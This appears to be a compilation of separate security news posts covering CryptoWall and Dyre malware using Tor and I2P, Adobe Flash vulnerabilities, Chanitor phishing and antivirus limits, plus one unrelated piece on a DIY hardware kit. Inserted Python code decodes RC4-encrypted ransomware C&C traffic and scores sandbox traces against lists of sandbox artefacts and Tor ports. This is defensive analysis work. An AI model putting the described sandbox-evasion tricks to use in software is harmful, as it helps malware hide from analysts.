The new variant of CryptoWall ransomware, like others, is distributed via malicious email and through malvertising campaigns. This variant was dubbed by the researchers CryptoWall 3.0 or Win32/Crowti, and it isn’t so different from previous instances. However, the experts noted that the names of the files containing the ransom demand have been changed to “HELP_DECRYPT.” This variant customizes files for each infected machine and provides victims a personalized link to a page that contains instructions. The instruction page is still reached through the Tor network.

The victims of CryptoWall 3.0 are given 7 days to pay $500 in Bitcoins if they want to decrypt their documents, but if they don’t pay in 7 days, the ransom increases to $1,000. On January 12, Microsoft identified 288 unique CryptoWall ver. 3.0 infections. “The graph below shows the spike after two days of no activity from 288 unique machines affected by this malware,” reads the post published by Microsoft.

Figure 9 – CryptoWall ver. 3.0 infections

The French researcher Kafeine, who analyzed CryptoWall 3.0, reported that the communications to the C&C server are encoded with the RC4 cipher. Another feature implemented in the latest variant of the malware is the support of I2P (Invisible Internet Project) for C&C communications. “It seems communication with the C&C are Rc4 encoded (key seems to be alphanum sorted path of the POST ) and using i2p protocol,” said Kafeine.
I2P is another anonymizing network used to hide the location of the control servers and make the botnet C&C resilient to law enforcement. Also recently, a new version of the popular black market Silk Road, Silk Road Reloaded, migrated to I2P, probably because at this moment there is the conviction that it is more secure than Tor.

It happens now … new Dyre banking trojan variant

A few days ago, the experts at TrendMicro spotted a new variant of the DYRE/Dyreza banking malware with new propagation and evasion techniques. The malware is spread through malicious emails containing the Upatre downloader disguised as a fax or the details of a package delivery, but once it is executed, the downloader drops the new Dyre variant, which in turn downloads the WORM_MAILSPAM.XDP worm.

The propagation technique implemented by the cyber criminals is very effective. The worm exploits the Microsoft Outlook email client present on the victim’s machine to spread spam emails with the Upatre downloader attached to them. The emails aren’t sent to the victim’s contacts; instead they are sent to email addresses passed by the C&C server. Once the emails are sent by the worm, it deletes itself.

This variant of Dyre uses hard-coded IP addresses for its C&C. The malware authors also implemented backup mechanisms for the command and control infrastructure that rely on a URL provided by the malware’s domain generation algorithm (DGA) or a hard-coded address of a C&C server hidden on the Invisible Internet Project (I2P) network.

Figure 10 – Dyre I2P

In this case, the I2P network is used as a supplementary way to control the botnet, a choice to make it more resilient to attacks.

Conclusion

Security experts believe that malware authors will continue to exploit anonymizing networks like Tor and I2P. Analyzing the timeline of malware detections made by the principal security firms, cyber criminals have been increasing the adoption of such networks since 2012.
Figure 11 – Malware in the Deep Web (Security Affairs)

Malware authors will exploit the Deep Web basically as a backup mechanism for their botnets and to make them more resistant to the various kinds of attacks operated by law enforcement.

References

- Skynet, the potential use of Tor as a bulletproof botnet | Security Affairs
- OnionDuke: APT Attacks exploited the Tor Network | Security Affairs
- New crimekit Atrax exploits Tor, mines Bitcoin and much more | Security Affairs
- Detected 64-bit ZeuS banking trojan using Tor network | Security Affairs
- http://securityaffairs.co/wordpress/27885/cyber-crime/bifrose-uses-tor.html
- http://blogs.cisco.com/security/talos/cryptowall-2
- http://malware.dontneedcoffee.com/2014/07/ctb-locker.html
- http://securityaffairs.co/wordpress/26763/cyber-crime/critroni-ransomware-use-tor.html
- http://securityaffairs.co/wordpress/31993/cyber-crime/cryptowall-ransomware-2-0.html
- http://securityaffairs.co/wordpress/21795/malware/tor-based-chewbacca-infect-pos.html
- https://community.rapid7.com/community/infosec/blog/2012/12/06/skynet-a-tor-powered-botnet-straight-from-reddit
- https://www.defcon.org/images/defcon-18/dc-18-presentations/D.Brown/DEFCON-18-Brown-TorCnC.pdf
- https://blog.gdatasoftware.com/blog/article/botnet-command-server-hidden-in-tor.html
- http://securityaffairs.co/wordpress/13747/cyber-crime/http-botnets-the-dark-side-of-an-standard-protocol.html
- http://contagiodump.blogspot.it/2014/11/onionduke-samples.html?m=1
- http://securelist.com/blog/events/58184/the-inevitable-move-64-bit-zeus-enhanced-with-tor/
- http://securityaffairs.co/wordpress/17601/cyber-crime/botnet-behind-tor-traffic-surge.html

Source: http://resources.infosecinstitute.com/hunting-malware-deep-web/
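The RC4-encoded C&C traffic that Kafeine describes for CryptoWall 3.0 in the I2P section above, modelled as an added analyst-side decoder (this is not code from the article or from any of the researchers it cites). It assumes, following Kafeine's wording, that the RC4 key is the alphanumeric characters of the POST path in sorted order; the request, path and beacon body below are constructed samples, not real malware traffic.

```python
import re


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key schedule plus keystream generator).
    The same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def key_from_path(path: str) -> bytes:
    """Key derivation as an assumption from Kafeine's note: keep only the
    alphanumeric characters of the URL path and sort them."""
    alnum = re.sub(r"[^0-9A-Za-z]", "", path)
    if not alnum:
        raise ValueError("path contains no alphanumeric characters")
    return "".join(sorted(alnum)).encode("ascii")


def split_http_post(raw: bytes):
    """Return (path, body) from a raw HTTP POST request.
    The body is left as bytes because it is ciphertext, not text."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("malformed request: no header/body separator")
    request_line = head.split(b"\r\n", 1)[0].decode("ascii", "replace")
    method, path, _version = request_line.split(" ", 2)
    if method != "POST":
        raise ValueError(f"not a POST request: {method}")
    return path, body


def decode_beacon(raw_request: bytes) -> bytes:
    """Recover the plaintext beacon from a captured POST request:
    derive the key from the path, then RC4-decrypt the body."""
    path, body = split_http_post(raw_request)
    return rc4(key_from_path(path), body)


# Constructed sample: a hypothetical beacon encrypted the same way, used only
# to exercise the decoder offline. Neither the path nor the body is real
# CryptoWall data; the beacon format is a placeholder.
SAMPLE_PATH = "/5uw9l3.php"
SAMPLE_PLAINTEXT = b"{constructed-beacon|VICTIMID-PLACEHOLDER|1}"


def build_sample_request() -> bytes:
    """Build the constructed capture: headers plus RC4-encrypted body."""
    body = rc4(key_from_path(SAMPLE_PATH), SAMPLE_PLAINTEXT)
    headers = (
        f"POST {SAMPLE_PATH} HTTP/1.1\r\n"
        "Host: example.invalid\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    ).encode("ascii")
    return headers + body


if __name__ == "__main__":
    print(decode_beacon(build_sample_request()))
```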
-
Social media platforms provide fertile ground for communication without borders, so there is actually no limitation as to the potential benefits that these platforms can offer to you. This is why so many Internet users have been registering for new accounts on Facebook, Twitter, Pinterest and Google+ on a daily basis, opening just another window of communication and online interaction with friends, relatives or even mere acquaintances and total strangers.

Most people own more than a couple of accounts on social media sites and use them fairly regularly (even every day, as we have mentioned above). They connect with others and share personal information, videos and pictures of them and their loved ones. They also share their thoughts and anything else worthy of attention.

Due to the significant increase in the social media accounts and their gravity, there have been major incidents of hacking. This means that many social media accounts get hacked, and this is not a rare phenomenon to comment on. On the contrary, many people have to confront such a negative consequence of the importance of social media nowadays; social media is an easy and simple way for hackers and other malicious intruders to have their way and penetrate the systems of many other people (the followers of the person whose account has been breached) at once.

Let’s start by looking into the signs that reveal the hacking, in order for you to be on alert and know when something is wrong with your account.

Signs of a Hacked Social Media Account

Although it can be difficult to realize that your social media account has been compromised, there are definitely signs that should raise an eyebrow and motivate you to look deeper into the root of the problem.
Some of the most frequent signs that reveal something is not great about your account include the following:

- You instantly observe likes and follows that you had nothing to do with
- You have your status updated, although you have not shared anything
- There is ad flood on your page (unusually extensive)
- You have trouble logging in
- Private messages are posted on your behalf
- Spam posts are posted on your behalf
- You have new friends that you do not recall adding
- Others inform you of sharing malicious content on your wall

If you notice some of these signs, you had better check it out and not sit idly. It is more than likely that your account has been hacked and you need to act promptly and effectively.

How do accounts get hacked?

In order for you to know how to be safe on social media, you need to know where the threat lies. Indeed, hacking a social media account is a lot easier and simpler than you would have expected it to be. There are sophisticated menaces nowadays lurking in the dark and targeting Internet users, so as to penetrate their system and access their sensitive data. These are the major methods for hacking a social media account being used by cybercriminals:

- Password exposed
- Phishing
- Malware installed
- Sites being hacked
- Third-party apps or services breached

As you can see, there are multiple routes to getting the desired effect and it is true that today the threats that appear online are far more advanced and sophisticated than a few years ago. So, your defensive line should be equally strong. Below, we are going to have a look at what you need to do if your social media account gets hacked.

What to do if your social media account has been hacked

Even if hacking has occurred, you should not panic. There are several steps that you can take in order for you to terminate the threat and reset the protection layering on your computer. Just follow the guidelines being provided below in avoidance of any further damage.
With dedicated work and attention, you will be able to regain your social media account and have nobody else threatening its integrity and uniqueness.

Of course it is crucial that you change your password immediately and that you use a solid password that has never been used by you anywhere else. The common strategy of using the same password on all of your accounts (email, banking accounts and social media platforms) can be catastrophic!

Delete the apps that appear on your social media account and that you know nothing about. If you have not installed anything, you do not need it on your account.

Equally important for safe social media is to set the default email address of your accounts and check that it is available for you to reach.

Make sure that your antivirus is up-to-date and schedule a thorough scan for any threats on your computer. If you use social media on multiple devices, have them all scanned.

Report spam posts, as they can hide malware and other threats. If a friend of yours clicks on them he might get in trouble and have his account hacked, too. You cannot allow this vicious circle to go on indefinitely.

Think twice before clicking on anything. New malware can crawl up to your account and therefore you need to be vigilant and eliminate such threats.

Use secure platforms for paid messaging. It is imperative that you buy the ads that you want right from the platform and not have a third-party getting in the way.

Last but not least, make sure that the online information of yours is safe. Do not reveal information that is linked to your account and do not expose too many details from your personal life online.

How to prevent hacking on social media

We have already outlined what needs to be done after having realized that your social media account has been breached. Nevertheless, it is essential that you know what you ought to do, in avoidance of repeating the same mistakes.
You ought to enhance your security layering and allow nothing to penetrate the safety of your online navigation. There are some fundamental details that will make a huge difference for you, and that will offer great power and effectiveness against malware and other threats.

First of all, you need to be cautious with your password. Besides choosing to use a solid password that is hard to guess, you need to be really scholastic about others knowing. Even if you use social media at work, you cannot risk having the password of yours in use when leaving your office. Always log out and be twice as scholastic with shared computers. Do not share your password with others, even with your best friend or your better half. This is private for a reason and you should never underestimate the risk that you take when letting someone else know your private information.

Apart from that, you ought to introduce yourself to two-factor authentication. This is an extra weapon that you can use to enhance the protection offered to you via your password. With two-factor authentication, you eliminate the threat of someone else breaching your social media account (or any other account, apparently). There is another step that has to be followed and another piece of information for someone else to breach, prior to gaining access to your social media account. So, this is a great weapon that can be put into effect and act like an armor for you online.

Bottom line

Safer social media can be really hard to achieve, however, if you are concentrated on what you do and if you focus on the guidelines that we have provided, you will see that you can recover from a potential hacking of your social account without any delay or frustration. Of course, you can follow these simple guidelines even if you haven’t been hacked – prevention is better than the cure, right? Feel free to enhance your social media account protection right away.
This will keep all dangers at bay and shield you against the malicious intent of others on the web. Remember that social media platforms can be truly helpful, provided that you know how to use them and what safety precautions you ought to take. Source
-
Oh, Adobe Flash. I knew you well, starting from when you were known as Macromedia Flash in the late 1990s. The dynamic web content you provided me was amazing. Streaming video over 56k would’ve been a major test of my patience, hence YouTube didn’t launch until 2005. But the games… Oh, the games! They were fun. Wait fifteen minutes to download, then five minutes of amusement could be had before it got tiring.

Webmasters loved the razzle dazzle of Flash applets even more than JavaScript applets for tacky animated menus and the like. Back when websites had “Best viewed with Netscape,” or “Best viewed with Internet Explorer” icons on their home pages, some web developers really enjoyed one-upping each other in needless Flashiness. “Look ma, this ain’t GeoCities no more!”

As web developers started to emphasize function over gimmickry, they started to focus their energy on interesting and useful web apps and streaming video as opposed to taking the sentiment behind the old HTML <blink> tag way too far. With Flash, the possibilities seemed endless. If you could make a very good SWF applet, people really appreciated it, especially once most people had Flash plugins in their web browsers. And of course, Flash was necessary for YouTube. YouTube launched the same year Adobe bought Macromedia, 2005. YouTube was such a phenomenon that Google had the good sense to buy it a year later.

Adobe is good at developing creative tools, however proprietary they are. What they’re not good at is security. No bloody way! Security bugs are inevitable in all applications from developers both big and small. But, they’re way more common in Adobe Acrobat and Adobe Flash than is typical for similar applications. One of the things I habitually do in my security hardening routine for both personal and professional client PCs is uninstall Acrobat, and replace it with another PDF viewer, such as Foxit Reader, when the machine I’m working on runs Windows.
Even though the end user doesn’t realize that I’ve given them a more secure application to open PDFs in, they always appreciate how their new application patches without popups, and gives them a better designed GUI, better in-browser functionality, and an overall better user experience.

I’m really happy to be able to say that now I can do the same thing to Flash as I do to Acrobat. Except, I don’t have to install another application to replace it. All I’ve got to ask an end user is, “do you ever go to YouTube?” They’ve always said yes. The really computer illiterate end users don’t know what Flash is, nor do they know that they sometimes view YouTube videos as an embedded applet on a webpage that’s not hosted at youtube.com. Asking them if they enjoy other websites that use Flash is an exercise in futility. “Huh? Do I use Google or Foxfire?” (Why oh why do they call Firefox “Foxfire?” Explaining to them the difference between the Google search engine and the Google Chrome web browser has made me ruin my manicures here and there.) But I could usually assume that they needed Flash for YouTube most of the time. A few years ago, they really needed it for games in Facebook, as well.

The first nail in the coffin was mobile. The late Steve Jobs, although I strongly dislike the guy, was correct when he said, “Flash has not performed well on mobile devices. We have routinely asked Adobe to show us Flash performing well on a mobile device, any mobile device, for a few years now. We have never seen it.”

Although Adobe really wanted to port Flash to mobile platforms, that effort was never successful. It was never available for iOS. It was available at times for Symbian, Palm OS, and webOS. It was available for some devices running Android versions 2.2 through 4.0.4. It never really seemed to catch on, once smartphones and tablets became the primary way for consumers to enjoy content from the Internet.

W3C started working on HTML 5 in 2004.
It was usable for me to play around in starting in 2010. But I’m more of a web page developer than a web app developer, so my web development was focused on standards compliance and cross browser and device compatibility rather than creating nifty things with the canvas element. Nonetheless, the introduction of the <video> tag made it a lot easier to embed video without Flash than ever before. And other new tags and functions in HTML 5, combined with sophisticated CSS and JavaScript use, rendered Flash unnecessary for dynamic apps, as well. HTML 5, when used by a competent developer, works just as well on mobile as it does on desktop platforms, and that was apparent well before HTML 5 became officially stable on October 28th, 2014. In fact, I can’t think of a more successful and widespread beta release off the top of my head. Unless you directly worked in web browser and engine development, October 28th would’ve been just another Tuesday.

Adobe announced that they had given up on developing Flash for mobile in November 2011. That well predated HTML 5’s stable release. In addition to games and other web apps using open standard alternatives to Flash, YouTube started to make HTML 5 compatible videos available in January 2010, via WebM and H.264. Also, there are native mobile apps for watching YouTube videos outside of the web. So, the thorough acceptance of cross platform open standards, especially HTML 5, combined with everyone and their grandma using mobile devices and Adobe’s struggle with it, sealed Flash’s doom.

Then, on January 27th of this year, YouTube announced that HTML 5 video is now default in Chrome, Internet Explorer 11, Safari 8, and the latest Firefox releases. If your browser uses one of the same rendering engines, such as the latest stable versions of WebKit and Trident, you’ll probably experience the same.
A Brief Summary of Adobe’s Security Problems

This is by far not a complete summary of all of the security problems Flash (and Acrobat) has had, but I’ll explain some of the major ones.

In 2007, an Adobe (Acrobat) Reader bug exposed the local filesystems of users’ computers to anyone who knew how to exploit it.

Trojan Adobe Flash Player and Reader updates started to become prevalent in 2008. It’s been such a problem that when I see an update popup on a user’s machine, I assume it’s malicious until I determine otherwise. So, that’s been a huge problem for consecutive years now. How come all kinds of other applications, open and closed, from developers of all sizes can patch without popups users have to interact with, but Adobe can’t manage to do that? That’s a massive trojan vector, and there are two disastrous sides to that coin. The vast majority of end users lack my expertise, particularly in malware. A Flash or Reader update popup could be a trojan. Sometimes end users have had experience with Adobe trojans already, so someone like me may have advised them to exercise caution when they see such a popup. But the popup could necessitate interaction for a legitimate and very necessary security patch. So with end users unable to determine whether or not a popup is a trojan, not interacting with it could be the less secure rather than more secure thing to do.

In 2009, Symantec’s Internet Security Threat Report explained how Adobe, with Flash and Reader, had one of their most insecure years ever. Adobe’s Chuck Geschke was tremendously arrogant when he was interviewed by John Paczkowski about that.

Paczkowski: “Both Apple and Microsoft have said publicly now that Flash has issues with reliability, security, and performance. Do you think those complaints are legitimate?”

Geschke: “I think they’re old news. Go to our website and read the actual facts about Flash. We enumerate the facts about Flash there as we see them.
They may have a different set of facts that they believe are accurate. It’s up to you to decide.”

Ummm, Mr. Geschke… Facts are never subjective by their very definition. Facts are facts, period. You sound like a bloody Scientologist. “Today, I feel like 2 + 2 = 5. It just feels right to me, but your mathematics professor may have a different set of facts they believe are accurate.”

Here are the facts. This is what Symantec’s 2009 report actually said, and I hold them in much higher esteem than I do Adobe:

“In 2009, Symantec documented 321 vulnerabilities affecting plugins for web browsers. ActiveX technologies were affected by 134 vulnerabilities, which was the highest among the plugin technologies examined. Of the remaining technologies, Java SE had 84 vulnerabilities, Adobe Reader had 49 vulnerabilities, QuickTime had 27 vulnerabilities, and Adobe Flash Player was subject to 23 vulnerabilities. The remaining four vulnerabilities affected extensions for Firefox…

“Among the vulnerabilities discovered in 2009, a vulnerability affecting both Adobe Reader and Flash Player was the second most attacked vulnerability. This was also one of four zero-day vulnerabilities affecting Adobe plug-ins during 2009. Two of the vulnerabilities were in the top five attacked vulnerabilities for 2009. Additionally, Adobe vulnerabilities have been associated with malicious code attacks such as the Pidief.E Trojan.”

Ouch! And Adobe’s position as one of the most insecure major software vendors ever didn’t cease in 2009. It still isn’t “old news,” Mr. Geschke.

Malicious PDFs were used to successfully attack Rackspace, Adobe, and Google in 2010.

A remote access bug was discovered in Flash in 2011. When properly exploited, one could acquire full control of an affected client machine.

Flash Player made it to the top of Symantec’s list of most exploitable plugins in 2012.

In October 2013, Adobe was attacked, revealing the sensitive data of 2.9 million users.
The sensitive data affected included credit card and debit card information.

The same day YouTube announced default HTML 5 video, January 27th, 2015, Adobe had to release a security patch for two really major Flash vulnerabilities. Independent security researcher Kafeine discovered vulnerability CVE-2015-0311. It allowed Flash to be used as a vector for malicious code injection which could, once again, give complete control of an affected machine to a blackhat. A security researcher named Bilou discovered CVE-2015-0312. It was very similar to CVE-2015-0311; it also enables remote code injection.

And of course, with Adobe being Adobe, barely a week passed before fifteen vulnerabilities had to be addressed in a patch that was released on February 5th. Yet again, these vulnerabilities enable remote malicious code injection and execution. If you’re still using Flash in Windows, OS X, and GNU/Linux, this is what you must know about eighteen additional CVE listings:

“Users of Adobe Flash Player for Windows and OS X should update to Adobe Flash Player 16.0.0.305. Users of Adobe Flash Player Extended Support Release should update to Adobe Flash Player 13.0.0.269. Users of Adobe Flash Player for Linux should update to Adobe Flash Player 11.2.202.442. The Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, will automatically update to version 16.0.0.305.”

I can safely assume that we’ll continue to learn about really major vulnerabilities that pertain to Flash and Reader for as long as those products continue to be developed by Adobe. I base that assumption not only on Adobe’s reputation and their tendency to take a head in the sand approach to security, but also on Adobe’s patch management style. Their patches address vulnerabilities that are near the surface of their applications, rather than the really deep vulnerabilities at the center of their really old code bases. Way too much of the code is unchanged from the 1990s.
I’d love for a security firm with much greater resources than I have to do a really thorough penetration test of the most recent versions of Flash and Reader for Windows, OS X, and GNU/Linux. The reported findings would probably require a forest’s worth of pulp if printed on paper. So, yes, security vulnerabilities can be found in products from all developers. But Adobe is much worse than the norm. Alternative PDF viewers and creators are available for pretty much all mobile and desktop platforms. And open web standards such as HTML 5 have made Flash obsolete. Heck, I even use GIMP instead of Photoshop.

Here’s my advice. Whether you’re enterprise or a consumer, get Adobe out of your abode. Now you can do it for content creation and consumption. And it’s easy.

References

- Still using Adobe Flash? Oh well, get updating: 15 hijack flaws patched - Shaun Nichols, The Register
- YouTube flushes Flash for future flicks - Simon Sharwood, The Register
- YouTube now defaults to HTML5 <video> - Richard Leider, YouTube Engineering and Developers Blog
- Another day, yet another emergency Adobe Flash patch. Because that's how we live now - Iain Thomson, The Register
- Adobe has an epically abysmal security record - Jose Pagliery, CNN Money, Oct. 8, 2013
- Adobe says hackers accessed data for 2.9 million customers - James O’Toole, CNN Money: http://money.cnn.com/2013/10/03/technology/security/adobe-hack/index.html?iid=EL
- Thoughts on Flash - Steve Jobs, Apple.com: https://www.apple.com/hotnews/thoughts-on-flash/
- Why You Should Ditch Adobe Shockwave - Brian Krebs, Krebs on Security: http://krebsonsecurity.com/2014/05/why-you-should-ditch-adobe-shockwave/
- YouTube says HTML5 video ready for primetime, makes it default - Ron Amadeo, Ars Technica: http://arstechnica.com/gadgets/2015/01/youtube-declares-html5-video-ready-for-primetime-makes-it-default/
- The tooth gnashing you hear is from Flash users installing a new 0day patch - Dan Goodin, Ars Technica: http://arstechnica.com/security/2015/01/those-teeth-gnashings-you-hear-are-flash-users-installing-a-new-0day-patch/
- How secure is Flash? Here’s what Adobe won’t tell you - Ed Bott, ZDNet: http://www.zdnet.com/article/how-secure-is-flash-heres-what-adobe-wont-tell-you/
- Adobe issues emergency Flash update for Windows and Mac - Dara Kerr, CNET: http://www.cnet.com/news/adobe-issues-emergency-flash-update-for-windows-and-mac/

Source
-
Black hats are flinging supposedly free licenses at enterprises in a bid to get malware on corporate networks, security bod Martin Nystrom says. They wrote malware that was slightly neurotic in its bid to evade detection and would make use of the Tor network to receive stolen data. The Cisco threat defence man said realistic phishing emails claiming approval for Microsoft licenses were personally-addressed to some of its customers foisting a link to where the malware would be downloaded. He said the malware would search for sandboxes, a tool common with researchers, and put itself to sleep for up to half an hour to avoid detection. "The email is very similar to the real email Microsoft sends," Nystrom said, adding analysis of the malware required a good measure of skill and resources. "The malware seemed to know it was being analysed (by Nystrom) and exited after 20 seconds without doing anything. "[it] sleeps to wait out automatic sandbox analysis before starting to communicate on the internet." Attackers served a copycat Microsoft Volume Licensing Service Center page hosted on hacked WordPress sites where a low-detection Chanitor malware variant would quietly download seemingly as a volume license. Once on a victim machine it would detect at least the three most popular sandboxes and use a sleep command to remain dormant for about 30 minutes. It would later alter a file structure to make some sandbox systems fail. Chanitor also probed a series of IP addresses before checking if Tor network connections were possible. Nystrom said the attack was typical of a trend to target corporate staff with smarter phishing emails, and of the continued cat-and-mouse game between white hat probing and black hat evasion. Source
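The evasion tricks the article attributes to this Chanitor variant (fingerprinting sandboxes, sleeping out the analysis window, then reaching for Tor) are exactly what an analyst wants a behaviour report scored for. Below is an added example in Python, not code from the post or from Cisco: it reads a constructed sandbox API trace and gives one point per evasion family. The trace format, the artefact strings, the Tor ports and the 120-second sleep threshold are assumptions for the example.

```python
"""Heuristic scorer for the evasion behaviour described above: probes for
analysis tools, long sleeps before any network activity, and a late turn to
Tor.  Added example; the trace format, artefact list and thresholds are
assumptions, not Cisco's or Chanitor's."""
from dataclasses import dataclass, field

# Constructed trace in the style of a sandbox behaviour report:
# (seconds since start, API, argument).  Not a real Chanitor sample.
SAMPLE_TRACE = [
    (0.1, "CreateFileW", r"\\.\VBoxMiniRdrDN"),
    (0.2, "GetModuleHandleA", "SbieDll.dll"),
    (0.3, "RegOpenKeyExA", r"HARDWARE\ACPI\DSDT\VBOX__"),
    (0.4, "Sleep", "1800000"),                  # 30 minutes, in milliseconds
    (1800.5, "connect", "203.0.113.10:80"),     # the IP probing
    (1801.0, "connect", "198.51.100.7:9001"),   # Tor OR port
]

# Strings malware commonly looks for when fingerprinting sandboxes (assumed).
SANDBOX_ARTEFACTS = ("vbox", "vmware", "sbiedll", "qemu", "xen", "cuckoo")
TOR_PORTS = {9001, 9030, 9050, 9150}
LONG_SLEEP_S = 120.0  # total pre-network sleep that counts as stalling


@dataclass
class EvasionReport:
    artefact_probes: list = field(default_factory=list)
    sleep_before_network_s: float = 0.0
    tor_candidates: list = field(default_factory=list)

    @property
    def score(self):
        """0-3: one point per evasion family observed."""
        return sum([
            bool(self.artefact_probes),
            self.sleep_before_network_s >= LONG_SLEEP_S,
            bool(self.tor_candidates),
        ])


def analyse_trace(trace):
    rep = EvasionReport()
    seen_network = False
    for _t, api, arg in trace:
        low = arg.lower()
        if any(a in low for a in SANDBOX_ARTEFACTS):
            rep.artefact_probes.append(arg)
        if api == "Sleep" and not seen_network:
            # Only sleeps before the first connection count: that is the
            # "wait out the sandbox" pattern, not ordinary pacing.
            rep.sleep_before_network_s += int(arg) / 1000.0
        if api in ("connect", "WSAConnect"):
            seen_network = True
            _host, _, port = arg.rpartition(":")
            if port.isdigit() and int(port) in TOR_PORTS:
                rep.tor_candidates.append(arg)
    return rep


if __name__ == "__main__":
    r = analyse_trace(SAMPLE_TRACE)
    print(f"score={r.score} probes={r.artefact_probes} "
          f"sleep={r.sleep_before_network_s}s tor={r.tor_candidates}")
```

A score of 3 on the sample trace is the pattern the article describes; a benign program that sleeps half a second and then talks HTTPS scores 0. Sandboxes that patch Sleep to return immediately would defeat the second check, which is why the trace keeps the requested duration rather than wall-clock time.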
-
Technology is easier than ever to use—tablets could come with stickers that say “suitable for ages 8 to 88,” and that probably wouldn’t be inclusive enough. Making stuff, however, remains daunting. To build software, you have to know how to program. To build hardware, you have to know how to solder. Or at least that’s how it feels most of the time. But we’re starting to see what user-friendly making looks like. IFTTT lets anyone link apps and services by stringing simple recipes together. LittleBits brings Lego-like simplicity to electronic tinkering. A new DIY kit called Mesh combines elements of both. Pairing a few simple sensors with a straightforward tablet interface, it lets anyone experiment with connected hardware ideas of their own.

Mesh, created by a small team of Japanese engineers from Sony, aims to make hardware hacking instantly accessible. Three domino-sized “tags” comprise the hardware: an accelerometer, a button, and an LED. They communicate wirelessly with a tablet app, which serves as a Quartz Composer-style visual sandbox for linking the hardware tags to various actions. Drag the icon for the accelerometer and the icon for the LED into the app’s workspace, draw a link between the two with your finger, and that’s it. Now, when you jostle the accelerometer, the LED turns on, wherever in the room it happens to be. Move the link from the LED to an “email” icon, and the accelerometer sends a preset note to your inbox instead.

The projects Mesh’s developers show off are, admittedly, silly. In one, we see how putting the accelerometer tag on a free weight could trigger an audio message encouraging you to keep pumping iron. This is not exactly the most compelling vision for our effortlessly programmable future. But when Takehiro Hagiwara and Shingo Yoshizumi, two of the Sony engineers working on the project, brought a prototype set by for a demo, it was easy to see the promise. Hagiwara said the idea was to make inventing intuitive, and it was.
While I certainly wasn’t building any sort of elaborate prototype, or, honestly, anything useful at all, the simple act of specifying a behavior on a screen and seeing it instantly adopted by the tags was kind of magical. Hagiwara and company are raising money on Indiegogo to continue developing the platform. Though the examples position it as more of a neat toy at this point, the team has a fourth tag, a general input/output module, that would allow advanced tinkerers to incorporate servos and other hardware. The team also aims to link Mesh to other software and web services, which could open up many compelling possibilities. It would be awesome to have a few cheap, physical sensors that could be linked up to stuff on IFTTT, for example.

If nothing else, Mesh is a glimpse of what tomorrow’s creative tools might look like. And rethinking those tools more broadly is relevant to novices and pros alike. Loren Brichter, the programmer behind the original iPhone Twitter app, recently described the state of programming thus: “It’s not like a boat with a couple of holes that we can patch; it’s more like trying to sail across an ocean on a pile of accrued garbage.” “The tools right now are so complicated that it takes all your mental energy just to try and ‘hold’ them,” he said, “so you have nothing left to actually do something interesting.” Source
-
-
TJX hacking mastermind Albert Gonzalez scoffed at antivirus tools. He and his cohorts wrote malware specifically designed to evade their detection. One can imagine him laughing as his team of hackers broke into corporate networks using SQL injection attacks and gained administrative access. Then he probably guffawed, Bond villain-style, as he uploaded the malware directly into server memory, and when the corporate networks began happily delivering customer credit card data directly to his servers, chuckled all the way to the bank.

Gonzalez was perhaps the biggest cyber criminal in history. He was eventually jailed for hacking more than 250 companies, ranging from retailers such as TJX and grocery chain Hannaford Bros through to payment processing company Heartland. He pilfered data from under their noses and cost them hundreds of millions of dollars. Even though many of these firms had antivirus software installed, they didn’t detect what he was doing. Why?

Mind the gaps

Don’t be mistaken: antivirus software is a crucial part of any security arsenal, and every day malware scanners the world over detect and throttle millions of malicious software strains. This is not a category of software that we should live without. Antivirus tools work by scanning both static files and programs running in memory. They use several techniques to try and detect malicious activity. Signature scanning, which looks for known patterns in files, is a well-established method of finding software nasties, as its scanning code runs in memory, looking for potentially malicious activity as it happens. These are solid, reliable tools, but when attackers are determined enough, antivirus software alone may not stop them from grabbing your data. The malware industry thrives on zero-day attacks – exploits using obscure or completely unknown vulnerabilities. A hacker smart enough to devise one – and there are plenty – can get past malware detectors.

The smart IT manager uses complementary technologies to reduce the risk of attack, and one is to look at the potential delivery channels for malware.

Ugly sites

One way in which attacks are delivered is via drive-by downloads. Employees visiting legitimate work sites are relatively safe, but when they visit less savoury sites online they run the risk of being infected by rogue JavaScript running in the browser. Web protection software can reduce that risk by blacklisting certain sites or groups of sites. Filtering web access is a good way to reduce the risk of infection by simply prohibiting access to sites that are not necessary for work. It can also be a worthy complement to antivirus software that will attempt to detect anything installed via the browser. This multi-faceted protection is a basic tenet of modern cyber security.

Another important vector is email. This has gained huge traction among attackers, who use it for phishing, and in some cases spear phishing targeting specific companies. Attackers can gather information about a company's organisational structure and employees. The list of sources here is endless, ranging from annual reports through to social media posts. These can be used to socially engineer employees to obtain login details or have them open a file containing a zero-day attack. Employee training is all-important here but it must be backed by a technological solution too. All it takes is for one user to open a file or click a link to a fake IT administrator page asking them to enter their single sign-on password as part of a security audit, and you can wave goodbye to the integrity of your network.

Big phish

The best way to counter threats delivered via email is to choke them off before employees even see them. Monitoring and filtering emails is therefore an important part of any corporate cyber-security strategy. Email can be scanned for viruses, and it can be controlled still further by scanning for known spam signatures and characteristics. This alone can root out the lion’s share of malicious or pestering emails, increasing employee productivity as well as reducing the risk of compromise. Adding blacklists for known bad domains and whitelists for recognised sources, such as business partners and customers, can be an extra-useful technique for locking email down. The further that companies can keep unscrubbed email away from their IT architectures the better. Pre-filtered email streams contain not only infected files but also large volumes of spam, which serve only to clog bandwidth and servers. Having these filtered offsite by a third-party service mitigates the problem, ensuring that only clean communications touch company servers.

Patch and mend

Even after all these measures have been taken, there is still the chance that a company’s systems can be compromised. The likes of Gonzalez, or the Sony Pictures hackers, are determined assailants. The battle doesn’t stop with web protection or email scanning. Making sure the software running on the network is up to date is an important aspect of any cyber-security strategy so that attackers can’t exploit any of the known vulnerabilities in the average operating system or application. Patch management processes and tools are critical, especially as companies grow larger and IT infrastructures become more complex. Understanding what has been rolled out and when can help IT administrators prevent dangerous holes from appearing in the system.

